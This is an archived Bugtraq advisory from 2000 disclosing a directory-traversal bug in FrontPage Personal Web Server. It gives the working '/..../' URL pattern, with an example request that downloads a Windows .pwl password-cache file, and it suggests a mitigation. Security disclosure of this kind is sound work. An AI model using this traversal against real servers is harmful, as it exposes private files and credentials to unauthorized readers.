[13883] in bugtraq
Doubledot bug in FrontPage FrontPage Personal Web Server.
daemon@ATHENA.MIT.EDU (Jan van de Rijt)
Thu Feb 17 06:30:48 2000
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0005_01BF7812.FB9D55C0"
Message-Id: <000801bf780a$9ad4b2e0$0100007f@localhost>
Date: Wed, 16 Feb 2000 00:15:51 +0100
Reply-To: Jan van de Rijt <rijt@wish.net>
From: Jan van de Rijt <rijt@WISH.NET>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01BF7812.FB9D55C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Description: Doubledot bug in FrontPage FrontPage Personal Web Server.
Compromise: Accessing drive trough browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive your drive could be =
accessed by any user accessing your page, simply by requesting any file =
in any directory except the files in the FrontPage dir. specially =
/_vti_pvt/.
How to exploit this bug?
Simply adding /..../ in the URL addressbar.
http://www.target.com/..../<any_dir>/<any_file>
so by requesting http://www.target.com/..../Windows/Admin.pwl the =
webserver let us download the .pwl file from the target.
Files and dirs. with the hidden attribute set are vulnerable.
Solution:
The best solution is installing FrontPage on a drive that doesn't =
contain Private information.
Greetings,
Jan van de Rijt aka The Warlock.
------=_NextPart_000_0005_01BF7812.FB9D55C0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Description: Doubledot bug in FrontPage =
FrontPage=20
Personal Web Server.<BR>Compromise: Accessing drive trough=20
browser.<BR>Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions =
not=20
tested.<BR>Details:<BR>When FrontPage-PWS runs a site on your c:\ drive =
your=20
drive could be accessed by any user accessing your page, simply by =
requesting=20
any file in any directory except the files in the FrontPage dir. =
specially=20
/_vti_pvt/.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>How to exploit this bug?<BR>Simply =
adding /..../ in=20
the URL addressbar.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://www.target.com/..../<">http://www.target.com/..../<</A>=
any_dir>/<any_file></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>so by requesting <A=20
href=3D"http://www.target.com/..../Windows/Admin.pwl">http://www.target.c=
om/..../Windows/Admin.pwl</A> the=20
webserver let us download the .pwl file from the target.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Files and dirs. with the hidden =
attribute set are=20
vulnerable.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Solution:<BR>The best solution is =
installing=20
FrontPage on a drive that doesn't contain Private =
information.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Jan van de Rijt aka The=20
Warlock.</FONT></DIV></BODY></HTML>
------=_NextPart_000_0005_01BF7812.FB9D55C0--
